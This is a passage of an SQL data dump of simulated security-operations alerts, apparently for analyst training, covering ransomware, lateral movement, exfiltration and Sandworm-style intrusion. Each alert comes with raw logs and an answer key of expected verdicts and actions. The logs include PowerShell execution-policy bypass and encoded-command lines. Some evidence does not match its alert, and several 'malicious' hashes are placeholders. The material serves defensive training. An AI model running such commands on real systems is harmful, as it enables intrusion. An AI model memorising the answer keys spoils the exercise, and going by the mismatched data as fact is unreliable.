'{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"fake_flash_update.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known ransomware delivery mechanism disguised as Adobe Flash update.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ransomware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"102.54.98.112\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address linked to known C2 servers.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the affected machine.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(522, 'DiskCryptor Ransomware Detected', 'high', 'File Integrity Monitoring', 'DiskCryptor has been activated on the victim\'s machine, initiating encryption of the hard drive and establishing ransomware persistence.', 'Persistence', 'T1486 - Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:36Z\",\"event_id\":\"FIM-2023-5698\",\"file_path\":\"C:\\\\Program Files\\\\DiskCryptor\\\\dcinst.exe\",\"file_hash\":\"8f14e45fceea167a5a36dedd4bea2543\",\"user\":\"compromised_user\",\"internal_ip\":\"192.168.1.105\",\"external_ip\":\"203.0.113.45\",\"event_type\":\"file_change\",\"description\":\"Unauthorized execution of DiskCryptor detected. File integrity compromised.\",\"additional_info\":{\"protocol\":\"HTTPS\",\"connection_status\":\"Active\"}}', '2026-01-06 01:39:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"8f14e45fceea167a5a36dedd4bea2543\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as DiskCryptor ransomware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous ransomware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"dcinst.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local Analysis\",\"verdict\":\"suspicious\",\"details\":\"Common filename used by DiskCryptor ransomware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User account showing unusual activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.139Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:36Z\\\",\\\"event_id\\\":\\\"FIM-2023-5698\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\DiskCryptor\\\\\\\\dcinst.exe\\\",\\\"file_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"event_type\\\":\\\"file_change\\\",\\\"description\\\":\\\"Unauthorized execution of DiskCryptor detected. File integrity compromised.\\\",\\\"additional_info\\\":{\\\"protocol\\\":\\\"HTTPS\\\",\\\"connection_status\\\":\\\"Active\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:19.139Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:36Z\\\",\\\"event_id\\\":\\\"FIM-2023-5698\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\DiskCryptor\\\\\\\\dcinst.exe\\\",\\\"file_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"event_type\\\":\\\"file_change\\\",\\\"description\\\":\\\"Unauthorized execution of DiskCryptor detected. File integrity compromised.\\\",\\\"additional_info\\\":{\\\"protocol\\\":\\\"HTTPS\\\",\\\"connection_status\\\":\\\"Active\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:19.139Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:36Z\\\",\\\"event_id\\\":\\\"FIM-2023-5698\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\DiskCryptor\\\\\\\\dcinst.exe\\\",\\\"file_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"event_type\\\":\\\"file_change\\\",\\\"description\\\":\\\"Unauthorized execution of DiskCryptor detected. File integrity compromised.\\\",\\\"additional_info\\\":{\\\"protocol\\\":\\\"HTTPS\\\",\\\"connection_status\\\":\\\"Active\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:19.139Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:36Z\\\",\\\"event_id\\\":\\\"FIM-2023-5698\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\DiskCryptor\\\\\\\\dcinst.exe\\\",\\\"file_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"event_type\\\":\\\"file_change\\\",\\\"description\\\":\\\"Unauthorized execution of DiskCryptor detected. File integrity compromised.\\\",\\\"additional_info\\\":{\\\"protocol\\\":\\\"HTTPS\\\",\\\"connection_status\\\":\\\"Active\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:19.139Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:36Z\\\",\\\"event_id\\\":\\\"FIM-2023-5698\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\DiskCryptor\\\\\\\\dcinst.exe\\\",\\\"file_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"event_type\\\":\\\"file_change\\\",\\\"description\\\":\\\"Unauthorized execution of DiskCryptor detected. File integrity compromised.\\\",\\\"additional_info\\\":{\\\"protocol\\\":\\\"HTTPS\\\",\\\"connection_status\\\":\\\"Active\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(523, 'Unauthorized SMB Traffic Observed', 'high', 'Network Traffic Analysis', 'An unauthorized SMB traffic pattern was detected indicating possible lateral movement within the network. The activity was flagged due to the use of known ransomware tactics to spread laterally across the network, utilizing the SMB protocol.', 'Lateral Movement', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T13:45:00Z\",\"event_id\":\"SMB-ALERT-004\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.25\",\"attacker_ip\":\"203.0.113.45\",\"protocol\":\"SMB\",\"detected_filename\":\"ransomware_payload.exe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"user\":\"john_doe\",\"action\":\"File Transfer\",\"status\":\"Suspicious\"}', '2026-01-06 01:39:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_monitoring\",\"verdict\":\"internal\",\"details\":\"Internal host involved in suspicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_monitoring\",\"verdict\":\"internal\",\"details\":\"Internal host receiving unauthorized SMB traffic.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP linked to ransomware distribution.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash matches known ransomware payload.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation\",\"verdict\":\"malicious\",\"details\":\"File named associated with ransomware operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(524, 'Encrypted Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP) System', 'Anomalous outbound traffic detected from an internal host to a known malicious IP. The traffic pattern suggests an attempt to exfiltrate encrypted files, which could potentially be used for ransom. The files in question were detected on host 192.168.1.23 and attempted to connect to external IP 203.0.113.45.', 'Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_source\":\"DLP System\",\"internal_ip\":\"192.168.1.23\",\"external_ip\":\"203.0.113.45\",\"detected_files\":[{\"filename\":\"confidential_data.enc\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}],\"username\":\"jsmith\",\"action\":\"attempted_exfiltration\",\"network_protocol\":\"HTTPS\",\"file_size\":\"15MB\"}', '2026-01-06 01:39:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"suspicious\",\"details\":\"Hash corresponds to encrypted file detected during exfiltration attempt.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.enc\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_dlp\",\"verdict\":\"suspicious\",\"details\":\"Filename indicative of sensitive encrypted data.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jsmith\",\"is_critical\":false,\"osint_result\":{\"source\":\"employee_directory\",\"verdict\":\"clean\",\"details\":\"Username of the individual using the compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.142Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_source\\\":\\\"DLP System\\\",\\\"internal_ip\\\":\\\"192.168.1.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"detected_files\\\":[{\\\"filename\\\":\\\"confidential_data.enc\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}],\\\"username\\\":\\\"jsmith\\\",\\\"action\\\":\\\"attempted_exfiltration\\\",\\\"network_protocol\\\":\\\"HTTPS\\\",\\\"file_size\\\":\\\"15MB\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.142Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_source\\\":\\\"DLP System\\\",\\\"internal_ip\\\":\\\"192.168.1.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"detected_files\\\":[{\\\"filename\\\":\\\"confidential_data.enc\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}],\\\"username\\\":\\\"jsmith\\\",\\\"action\\\":\\\"attempted_exfiltration\\\",\\\"network_protocol\\\":\\\"HTTPS\\\",\\\"file_size\\\":\\\"15MB\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.142Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_source\\\":\\\"DLP System\\\",\\\"internal_ip\\\":\\\"192.168.1.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"detected_files\\\":[{\\\"filename\\\":\\\"confidential_data.enc\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}],\\\"username\\\":\\\"jsmith\\\",\\\"action\\\":\\\"attempted_exfiltration\\\",\\\"network_protocol\\\":\\\"HTTPS\\\",\\\"file_size\\\":\\\"15MB\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.142Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_source\\\":\\\"DLP System\\\",\\\"internal_ip\\\":\\\"192.168.1.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"detected_files\\\":[{\\\"filename\\\":\\\"confidential_data.enc\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}],\\\"username\\\":\\\"jsmith\\\",\\\"action\\\":\\\"attempted_exfiltration\\\",\\\"network_protocol\\\":\\\"HTTPS\\\",\\\"file_size\\\":\\\"15MB\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.142Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_source\\\":\\\"DLP System\\\",\\\"internal_ip\\\":\\\"192.168.1.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"detected_files\\\":[{\\\"filename\\\":\\\"confidential_data.enc\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}],\\\"username\\\":\\\"jsmith\\\",\\\"action\\\":\\\"attempted_exfiltration\\\",\\\"network_protocol\\\":\\\"HTTPS\\\",\\\"file_size\\\":\\\"15MB\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(525, 'Initial Breach Detected: Unauthorized Network Access', 'high', 'Network Traffic Analysis', 'The attackers exploited a vulnerability in the event\'s ticketing system to enter the network. This marks the first step in their infiltration, indicating a sophisticated approach to gaining a foothold within the target\'s network.', 'Initial Access', 'T1190 - Exploit Public-Facing Application', 1, 'closed', 1, '{\"timestamp\":\"2023-10-15T14:56:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.2.3\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"request_url\":\"https://event.ticketing.com/login\",\"exploit_used\":\"CVE-2023-XXXX\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"exploit_payload.bin\",\"username\":\"compromised_user\"}', '2026-01-06 01:44:46', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server targeted by initial access.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used by Sandworm.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"exploit_payload.bin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used in exploitation attempts.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Activity Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Unusual login activity detected.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(526, 'Malicious Script Execution: Ceremony Systems Compromised', 'high', 'Endpoint Detection and Response (EDR)', 'A carefully crafted script was executed on key systems involved in the ceremony, initiating a sequence of disruptions. The script is linked to known Sandworm TTPs, aiming to deploy destructive malware within the ceremony\'s IT infrastructure.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:35:23Z\",\"hostname\":\"ceremony-server-01\",\"username\":\"admin_ceremony\",\"process\":\"/usr/bin/powershell\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\Public\\\\malicious_script.ps1\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"internal_ip\":\"10.10.5.23\",\"external_ip\":\"185.143.223.101\",\"filename\":\"malicious_script.ps1\",\"process_id\":4721,\"malware_family\":\"Olympic Destroyer\"}', '2026-01-06 01:44:46', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.10.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with the compromised server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.143.223.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"External IP address associated with known Sandworm operations.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Olympic Destroyer malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"Script file executed on the server, related to the malicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(527, 'Persistence Mechanism Activated: Backdoors Installed', 'high', 'System Logs', 'The threat actors associated with the Sandworm group have successfully installed backdoors on multiple systems within the network. This action is part of their persistence strategy to maintain access even if initial access vectors are mitigated. The logs indicate suspicious activity from an external IP address linked with known malicious activity.', 'Persistence', 'T1059: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":4625,\"source_ip\":\"185.92.220.33\",\"username\":\"compromised_user\",\"command_executed\":\"powershell -encodedCommand UwBlAHIAdgBpAGMAZQAgAHMAdABhAHIAdAAgAC0AcABhAHIAcwBlAFMAdABhAHIAdAAgAE0AdQBsAHQAaQBzAHQAYQByAHQAZQByACAALQBhAHQAdAByACAAIgBIAEEAVABjAGgAIgA=\",\"file_created\":\"C:\\\\Windows\\\\System32\\\\backdoor.exe\",\"file_hash\":\"2c1743a391305fbf367df8e4f069f9f9\",\"internal_ip\":\"192.168.1.15\"}', '2026-01-06 01:44:46', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.33\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous Sandworm group activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"User account observed in unusual activity\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"2c1743a391305fbf367df8e4f069f9f9\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known backdoor executable\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Logs\",\"verdict\":\"internal\",\"details\":\"Internal host showing signs of compromise\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.145Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":4625,\\\"source_ip\\\":\\\"185.92.220.33\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"command_executed\\\":\\\"powershell -encodedCommand UwBlAHIAdgBpAGMAZQAgAHMAdABhAHIAdAAgAC0AcABhAHIAcwBlAFMAdABhAHIAdAAgAE0AdQBsAHQAaQBzAHQAYQByAHQAZQByACAALQBhAHQAdAByACAAIgBIAEEAVABjAGgAIgA=\\\",\\\"file_created\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"2c1743a391305fbf367df8e4f069f9f9\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.145Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":4625,\\\"source_ip\\\":\\\"185.92.220.33\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"command_executed\\\":\\\"powershell -encodedCommand UwBlAHIAdgBpAGMAZQAgAHMAdABhAHIAdAAgAC0AcABhAHIAcwBlAFMAdABhAHIAdAAgAE0AdQBsAHQAaQBzAHQAYQByAHQAZQByACAALQBhAHQAdAByACAAIgBIAEEAVABjAGgAIgA=\\\",\\\"file_created\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"2c1743a391305fbf367df8e4f069f9f9\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.145Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 